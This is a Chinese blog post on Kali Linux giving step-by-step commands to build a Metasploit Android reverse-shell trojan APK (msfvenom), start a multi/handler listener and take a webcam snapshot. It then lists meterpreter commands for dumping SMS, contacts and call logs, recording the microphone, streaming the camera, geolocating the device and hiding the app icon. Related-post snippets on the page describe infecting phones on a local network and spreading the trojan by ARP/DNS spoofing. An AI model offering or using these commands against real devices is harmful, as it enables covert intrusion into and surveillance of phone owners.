kali系统渗透android

已于 2022-12-25 17:21:49 修改
阅读量892 收藏 21
点赞数
分类专栏: Kali 文章标签: android
于 2022-12-25 17:07:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37137902/article/details/128436371
版权

生成木马

msfvenom -p android/meterpreter/reverse_tcp lhost="192.168.1.8" lport=5000 R > /root/payload.apk

 运行msfconsole

msfconsole
use exploit/multi/handler

设置配置并启动

set payload android/meterpreter/reverse_tcp
set LhOST 192.168.1.8
set lport 5000
run

 拍照

webcam_snap

附命令

===========

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN information


Application Controller Commands
===============================

    Command        Description
    -------        -----------
    app_install    Request to install apk file
    app_list       List installed apps in the device
    app_run        Start Main Activty for package name
    app_uninstall  Request to uninstall application

Chasmれ
关注
专栏目录
如何安装测试系统kali
05-11
3. Android 手机安装:对于 Android 设备,可以刷入支持 Cyanogenmod 系统的 ROM,然后安装 Kali Linux。 【注意事项】 安装和使用 Kali Linux 时,必须遵守法律法规,不得用于非法活动。学习渗透测试技术的目的是...
Msf--控制 Android手机
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
08-02 1327
|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lh...
kali完成一次android渗透测试
weixin_51715176的博客
05-05 3128
一次简单的渗透测试
安卓手机搭建kali环境,手机变成便携式渗透神器_kali linux手机版安装
最新发布
shanguicsdn111的博客
09-18 1354
kali是著名的黑客专用系统,一般都是直接装在物理机或者虚拟机上,我们可以尝试把kali安装在手机上,把手机打造成一个便携式渗透神器。我们需要下载以下3款软件:(1).Termux(终端模拟器)(2).AnLinux(里边有各种安装liunx的命令)(3).vnc view(远程控制客户端)看下这三款软件长什么样(软件的下载都在google商店上)可以在本公众号回复“20201224”获取以上软件。下载好之后可以开始安装了我们打开AnLinux会看到一下界面我们选择仪表盘后来到这个节目。
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2337
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2582
使用msfvenom生成木马控制手机
基于Android设备的Kali Linux渗透测试教程1
06-13
例如,在“第1章渗透测试”中,作者对渗透测试的流程和分类进行了基础性介绍,并逐步指导用户如何在Android设备上安装Kali Linux系统。这一部分还涉及了如何通过SSH或VNC远程连接到Kali Linux系统。 接着,在“第2...
基于Android设备的Kali Linux渗透测试基础
08-02
基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程
kali for android让你的安卓设备跑起kali.docx
08-20
Kali for Android 是一种将 Kali 系统安装到安卓设备上的解决方案,将安卓设备变成渗透测试小钢炮。以下是实现 Kali for Android 的详细步骤和知识点: 一、前提条件 * 安卓设备已经获取了 root 权限 * 安卓设备...
Android_Pentest_Tools:适用于Kali Linux的Android渗透测试工具
05-01
Android Pentest工具 专为kali linux设计javaFX + Spring boot + bash脚本一键完成所有常规步骤更新1.0版发布了!建造mvn clean package跑步java -jar target/android-pentest-tool*.jar去做: 添加安装步骤添加功能...
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 6306
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
msf渗透安卓
weixin_30872499的博客
05-29 583
/*metasploit之远控*/msfconsole //开启metasploit模块/*根据自己的IP生成一个木马*/msfvenom -p 系统/meterpreter/reverse_tcp LHOST=IP LPORT = 端口 R> 文件名.exe(安卓.apk) use expolit/multi/handler //开启模块 show options //查看参数设置...
MSF入侵安卓手机
2301_77162959的博客
07-11 1421
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
使用kali安卓手机进行渗透测试
lxy123_com的博客
02-12 2万+
实验环境:Kali虚拟机一台,4G运行,IP地址192.168.0.105;安卓手机一部,建议使用不用的破手机 实验目的:对安卓机进行攻击测试 实验步骤: (一),配置卡里环境 1,kali配置网络 ┌──(root????kali)-[~] └─#ifconfig 查看kali本机IP地址 eth0: flags=4
利用MSF打包加固APK对安卓手机进行控制
dl1286670932的博客
10-08 7645
由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标,点击后没有任何app界面。注入后的app在安装时,手机管家不会有任何安全提示,原始msf生成的app程序,安装时手机管家会有安全警示。
Kali Linux-MSF远控局域网手机
热门推荐
道阻且长,行则将至。
01-14 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 机器 IP地址 Win10 物理主机 192.168.0.105 Kali 虚拟机 192.16...
MSF基本使用和控制台命令
分享学习网络的点点滴滴
12-26 976
● Msfconsole使用接口○ 最流行的用户接口○ 几乎可以使用全部MSF功能○ 控制台命令支持TAB自动补全○ 支持外部命令的执行(系统命令等)○ 点击鼠标启动 / msfconsole -h -q -r -v / exit○ help /?
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1949
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
kali渗透android
02-04
Kali Linux是一款专门用于渗透测试和网络安全的操作系统。它提供了丰富的工具和资源,用于评估和测试网络的安全性。在Kali Linux中,你可以使用各种工具来渗透测试Android设备。 渗透测试Android设备的目的是评估设备的安全性,并发现可能存在的漏洞和弱点。以下是一些常用的Kali Linux工具和技术,可以用于渗透测试Android设备: 1. Metasploit:Metasploit是一款强大的渗透测试框架,它提供了各种模块和工具,用于发现和利用安全漏洞。你可以使用Metasploit来执行针对Android设备的攻击。 2. ADB(Android Debug Bridge):ADB是Android开发工具包中的一个命令行工具,它允许你与Android设备进行通信和控制。你可以使用ADB来获取设备的信息、安装应用程序、执行命令等。 3. APK反编译:Kali Linux中有一些工具可以帮助你反编译Android应用程序(APK文件),以便分析其代码和结构。例如,apktool和dex2jar是两个常用的工具,可以将APK文件转换为可读的源代码。 4. 漏洞扫描器:Kali Linux中有一些漏洞扫描器,可以用于扫描Android设备上的漏洞和弱点。例如,Nessus和OpenVAS是两个常用的漏洞扫描工具,可以帮助你发现设备上可能存在的安全问题。 5. 社会工程学:社会工程学是一种通过欺骗和操纵人类行为来获取信息的技术。在渗透测试中,你可以使用社会工程学技术来诱使用户执行恶意操作或泄露敏感信息。 需要注意的是,渗透测试是一项合法的活动,但在进行任何渗透测试之前,请确保你已经获得了合法的授权,并遵守相关法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值